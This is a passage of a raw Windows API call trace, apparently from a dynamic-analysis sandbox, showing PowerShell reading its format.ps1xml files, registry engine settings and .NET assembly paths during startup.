ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0103.103] SetErrorMode (uMode=0x1) returned 0x1 [0103.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0103.103] SetErrorMode (uMode=0x1) returned 0x1 [0103.103] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad0a0 | out: lpFileInformation=0x1ad0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0103.103] SetErrorMode (uMode=0x1) returned 0x1 [0103.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0103.103] SetErrorMode (uMode=0x1) returned 0x1 [0103.103] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad0a0 | out: lpFileInformation=0x1ad0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0103.103] SetErrorMode (uMode=0x1) returned 0x1 [0103.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0103.104] SetErrorMode (uMode=0x1) returned 0x1 [0103.104] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad0a0 | out: lpFileInformation=0x1ad0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0103.104] SetErrorMode (uMode=0x1) returned 0x1 [0103.104] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0103.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.104] CoTaskMemFree (pv=0x1b7400b0) [0103.107] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0103.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.107] CoTaskMemFree (pv=0x1b7400b0) [0103.107] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0103.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.107] CoTaskMemFree (pv=0x1b7400b0) [0103.107] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0103.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.107] CoTaskMemFree (pv=0x1b7400b0) [0103.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0103.107] SetErrorMode (uMode=0x1) returned 0x1 [0103.107] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308 [0103.107] GetFileType (hFile=0x308) returned 0x1 [0103.108] SetErrorMode (uMode=0x1) returned 0x1 [0103.108] GetFileType (hFile=0x308) returned 0x1 [0103.108] ReadFile (in: hFile=0x308, lpBuffer=0x32bcff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x32bcff8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.110] ReadFile (in: hFile=0x308, lpBuffer=0x32bcff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x32bcff8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.110] ReadFile (in: hFile=0x308, lpBuffer=0x32bcff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x32bcff8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.110] ReadFile (in: hFile=0x308, lpBuffer=0x32bcff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x32bcff8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.111] ReadFile (in: hFile=0x308, lpBuffer=0x32bcff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x32bcff8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.111] ReadFile (in: hFile=0x308, lpBuffer=0x32bcff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x32bcff8*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.111] ReadFile (in: hFile=0x308, lpBuffer=0x32bcff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x32bcff8*, lpNumberOfBytesRead=0x1acd38*=0x9e2, lpOverlapped=0x0) returned 1 [0103.111] ReadFile (in: hFile=0x308, lpBuffer=0x32bc542, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x32bc542*, lpNumberOfBytesRead=0x1acd38*=0x0, lpOverlapped=0x0) returned 1 [0103.111] ReadFile (in: hFile=0x308, lpBuffer=0x32bcff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x32bcff8*, lpNumberOfBytesRead=0x1acd38*=0x0, lpOverlapped=0x0) returned 1 [0103.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0103.111] SetErrorMode (uMode=0x1) returned 0x1 [0103.111] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1acce0 | out: lpFileInformation=0x1acce0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0103.111] SetErrorMode (uMode=0x1) returned 0x1 [0103.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0103.112] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acdc8 | out: phkResult=0x1acdc8*=0x308) returned 0x0 [0103.112] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd4c, lpData=0x0, lpcbData=0x1acd48*=0x0 | out: lpType=0x1acd4c*=0x1, lpData=0x0, lpcbData=0x1acd48*=0x56) returned 0x0 [0103.112] CoTaskMemAlloc (cb=0x5a) returned 0x247f80 [0103.112] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd1c, lpData=0x247f80, lpcbData=0x1acd18*=0x56 | out: lpType=0x1acd1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1acd18*=0x56) returned 0x0 [0103.112] CoTaskMemFree (pv=0x247f80) [0103.112] RegCloseKey (hKey=0x308) returned 0x0 [0103.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0103.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0103.114] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x940af442, Data2=0x8215, Data3=0x4dc2, Data4=([0]=0x9c, [1]=0x3c, [2]=0x93, [3]=0xde, [4]=0x1, [5]=0xda, [6]=0x43, [7]=0xe8))) returned 0x0 [0103.115] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x807411e7, Data2=0x37c0, Data3=0x4d4b, Data4=([0]=0xa3, [1]=0xbe, [2]=0x40, [3]=0xe2, [4]=0xe1, [5]=0xc3, [6]=0xe1, [7]=0xae))) returned 0x0 [0103.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0103.116] SetErrorMode (uMode=0x1) returned 0x1 [0103.117] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308 [0103.117] GetFileType (hFile=0x308) returned 0x1 [0103.117] SetErrorMode (uMode=0x1) returned 0x1 [0103.117] GetFileType (hFile=0x308) returned 0x1 [0103.117] ReadFile (in: hFile=0x308, lpBuffer=0x32e7b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x32e7b60*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.118] ReadFile (in: hFile=0x308, lpBuffer=0x32e7b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x32e7b60*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.118] ReadFile (in: hFile=0x308, lpBuffer=0x32e7b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x32e7b60*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.119] ReadFile (in: hFile=0x308, lpBuffer=0x32e7b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x32e7b60*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.119] ReadFile (in: hFile=0x308, lpBuffer=0x32e7b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x32e7b60*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.119] ReadFile (in: hFile=0x308, lpBuffer=0x32e7b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x32e7b60*, lpNumberOfBytesRead=0x1acd38*=0xfb2, lpOverlapped=0x0) returned 1 [0103.120] ReadFile (in: hFile=0x308, lpBuffer=0x32e727a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x32e727a*, lpNumberOfBytesRead=0x1acd38*=0x0, lpOverlapped=0x0) returned 1 [0103.120] ReadFile (in: hFile=0x308, lpBuffer=0x32e7b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x32e7b60*, lpNumberOfBytesRead=0x1acd38*=0x0, lpOverlapped=0x0) returned 1 [0103.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0103.120] SetErrorMode (uMode=0x1) returned 0x1 [0103.120] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1acce0 | out: lpFileInformation=0x1acce0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0103.120] SetErrorMode (uMode=0x1) returned 0x1 [0103.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0103.120] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acdc8 | out: phkResult=0x1acdc8*=0x308) returned 0x0 [0103.120] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd4c, lpData=0x0, lpcbData=0x1acd48*=0x0 | out: lpType=0x1acd4c*=0x1, lpData=0x0, lpcbData=0x1acd48*=0x56) returned 0x0 [0103.120] CoTaskMemAlloc (cb=0x5a) returned 0x247f80 [0103.120] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd1c, lpData=0x247f80, lpcbData=0x1acd18*=0x56 | out: lpType=0x1acd1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1acd18*=0x56) returned 0x0 [0103.120] CoTaskMemFree (pv=0x247f80) [0103.120] RegCloseKey (hKey=0x308) returned 0x0 [0103.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0103.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0103.122] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x6df46d1d, Data2=0x741f, Data3=0x492f, Data4=([0]=0x9a, [1]=0x4c, [2]=0xd6, [3]=0x4e, [4]=0x1d, [5]=0x12, [6]=0x77, [7]=0x38))) returned 0x0 [0103.122] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xc64dddbf, Data2=0x5347, Data3=0x4812, Data4=([0]=0xbc, [1]=0x94, [2]=0x66, [3]=0x6a, [4]=0xb1, [5]=0xf5, [6]=0xe1, [7]=0x13))) returned 0x0 [0103.122] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xeeb3e70b, Data2=0x8cdf, Data3=0x43be, Data4=([0]=0xba, [1]=0xab, [2]=0x6b, [3]=0x6d, [4]=0x49, [5]=0x2e, [6]=0x90, [7]=0xd8))) returned 0x0 [0103.122] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xfa5b384f, Data2=0xef1e, Data3=0x4878, Data4=([0]=0xbb, [1]=0x2e, [2]=0x7f, [3]=0x7a, [4]=0x8f, [5]=0x82, [6]=0xbc, [7]=0xee))) returned 0x0 [0103.123] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x7dae4e63, Data2=0x7c09, Data3=0x4719, Data4=([0]=0xae, [1]=0xca, [2]=0x6e, [3]=0xfe, [4]=0x5, [5]=0xd6, [6]=0x22, [7]=0xa1))) returned 0x0 [0103.123] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x828f180c, Data2=0x9ce5, Data3=0x48b9, Data4=([0]=0x82, [1]=0xe9, [2]=0x55, [3]=0x38, [4]=0xba, [5]=0x62, [6]=0x54, [7]=0x3c))) returned 0x0 [0103.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0103.123] SetErrorMode (uMode=0x1) returned 0x1 [0103.123] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308 [0103.123] GetFileType (hFile=0x308) returned 0x1 [0103.123] SetErrorMode (uMode=0x1) returned 0x1 [0103.123] GetFileType (hFile=0x308) returned 0x1 [0103.123] ReadFile (in: hFile=0x308, lpBuffer=0x33338c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33338c0*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.125] ReadFile (in: hFile=0x308, lpBuffer=0x33338c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33338c0*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.125] ReadFile (in: hFile=0x308, lpBuffer=0x33338c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33338c0*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.125] ReadFile (in: hFile=0x308, lpBuffer=0x33338c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33338c0*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.126] ReadFile (in: hFile=0x308, lpBuffer=0x33338c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33338c0*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.126] ReadFile (in: hFile=0x308, lpBuffer=0x33338c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33338c0*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.126] ReadFile (in: hFile=0x308, lpBuffer=0x33338c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33338c0*, lpNumberOfBytesRead=0x1acd38*=0xaca, lpOverlapped=0x0) returned 1 [0103.126] ReadFile (in: hFile=0x308, lpBuffer=0x3332ef2, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3332ef2*, lpNumberOfBytesRead=0x1acd38*=0x0, lpOverlapped=0x0) returned 1 [0103.126] ReadFile (in: hFile=0x308, lpBuffer=0x33338c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x33338c0*, lpNumberOfBytesRead=0x1acd38*=0x0, lpOverlapped=0x0) returned 1 [0103.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0103.126] SetErrorMode (uMode=0x1) returned 0x1 [0103.127] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1acce0 | out: lpFileInformation=0x1acce0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0103.127] SetErrorMode (uMode=0x1) returned 0x1 [0103.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0103.127] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acdc8 | out: phkResult=0x1acdc8*=0x308) returned 0x0 [0103.127] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd4c, lpData=0x0, lpcbData=0x1acd48*=0x0 | out: lpType=0x1acd4c*=0x1, lpData=0x0, lpcbData=0x1acd48*=0x56) returned 0x0 [0103.127] CoTaskMemAlloc (cb=0x5a) returned 0x247f80 [0103.127] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd1c, lpData=0x247f80, lpcbData=0x1acd18*=0x56 | out: lpType=0x1acd1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1acd18*=0x56) returned 0x0 [0103.127] CoTaskMemFree (pv=0x247f80) [0103.127] RegCloseKey (hKey=0x308) returned 0x0 [0103.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0103.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0103.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c [0103.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0103.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0103.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.143] GetFullPathNameW (in: 